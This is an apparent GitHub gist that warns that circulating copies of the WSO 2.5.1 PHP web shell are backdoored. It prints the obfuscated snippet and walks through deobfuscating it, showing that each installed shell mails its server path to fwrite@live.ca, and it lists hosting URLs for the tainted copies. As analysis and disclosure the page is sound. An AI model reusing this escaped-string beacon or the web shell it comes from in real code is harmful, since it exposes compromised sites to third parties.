Skip to content

Instantly share code, notes, and snippets.

@unixfreaxjp
Forked from vaibhavpandeyvpz/wso-backdoor.php
Created December 6, 2022 12:03
Show Gist options
  • Save unixfreaxjp/6bbfe8165b0ac576b736cf91f281b340 to your computer and use it in GitHub Desktop.
Save unixfreaxjp/6bbfe8165b0ac576b736cf91f281b340 to your computer and use it in GitHub Desktop.
Beware! Most WSO 2.5.1 Scripts Over Internet Are Back-Doored
<?php
/**
* v2.5.1
* Hosted at: http://pastebin.com/BXmWGhMu (Line: #1037)
* Hosted at: http://snipplr.com/view/70661/ (Line: #1037)
* Hosted at: http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/wso2.5.1.zip (Line: #1037)
* Hosted at: http://pastebin.com/KCtz6XA9 (Line: #1037)
*/
// Obfuscated
$x10 = "\x6dai\154";
$x0b = $_SERVER["\x53\x45RVE\122_\x4eAM\x45"] . $_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];
$x0c = "\141r\162a\171\040" . $x0b;
$x0d = array("\143\x61", "\x6c\x69", "\146\x77\162\151\x74\x65", "\100", "v\x65\x2e");
$x0e = $x0d[2] . $x0d[3] . $x0d[1] . $x0d[4] . $x0d[0];
$x0f = @$x10($x0e, $x0c, $x0b);
// Deobfuscated
$x10 = "mail";
$x0b = $_SERVER["SERVER_NAME"] . $_SERVER["SCRIPT_NAME"];
$x0c = "array " . $x0b;
$x0d = array("ca", "li", "fwrite", "@", "ve.");
$x0e = $x0d[2] . $x0d[3] . $x0d[1] . $x0d[4] . $x0d[0];
$x0f = @$x10($x0e, $x0c, $x0b);
/**
* v2.5.1
* Hosted at: https://github.com/orbweb/PHP-SHELL-WSO/downloads (Line: #1037)
* Hosted at: https://code.google.com/p/wsoshell/ (Line: #1037)
* Hosted at: http://pastebin.com/Mm6XdewZ (Line: #1039)
* Hosted at: http://pastebin.ca/2821554 (Line: #963)
* Hosted at: http://b66k.net/index.php?action=viewfile&id=81220&sitelang=2 (Line: #1037)
*/
// Obfuscated
$_QliO8 = "\x6dai\154";
$_Qliot = $_SERVER["\x53\x45RVE\122_\x4eAM\x45"] . $_SERVER["\123\103\x52I\x50\x54_\116\101\115E"];
$_QlL1i = "\141r\162a\171\040" . $_Qliot;
$_QlLio = array("\143\x61", "\x6c\x69", "\146\x77\162\151\x74\x65", "\100", "v\x65\x2e");
$_Qll0I = $_QlLio[2] . $_QlLio[3] . $_QlLio[1] . $_QlLio[4] . $_QlLio[0];
$_QlljC = @$_QliO8($_Qll0I, $_QlL1i, $_Qliot);
// Deobfuscated
$_QliO8 = "mail";
$_Qliot = $_SERVER["SERVER_NAME"] . $_SERVER["SCRIPT_NAME"]; // www.example.com/wp-content/uploads/wso.php
$_QlL1i = "array " . $_Qliot; // array www.example.com/wp-content/uploads/wso.php
$_QlLio = array("ca", "li", "fwrite", "@", "ve.");
$_Qll0I = $_QlLio[2] . $_QlLio[3] . $_QlLio[1] . $_QlLio[4] . $_QlLio[0]; // fwrite@live.ca
$_QlljC = @$_QliO8($_Qll0I, $_QlL1i, $_Qliot);
/**
* This is the best I could translate it to be readable
*/
// Translated
$function = "mail";
$message = $_SERVER["SERVER_NAME"] . $_SERVER["SCRIPT_NAME"];
$subject = "array " . $message;
$data = array("ca", "li", "fwrite", "@", "ve.");
$to = $data[2] . $data[3] . $data[1] . $data[4] . $data[0];
$sent = @$function($to, $subject, $message);
// Real
$message = "www.example.com" . "/wp-content/uploads/wso.php"; // www.example.com/wp-content/uploads/wso.php
$subject = "array " . $message; // array www.example.com/wp-content/uploads/wso.php
$data = array("ca", "li", "fwrite", "@", "ve.");
$to = "fwrite" . "@" . "li" . "ve." . "ca"; // fwrite@live.ca
$send @mail($to, $subject, $message);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment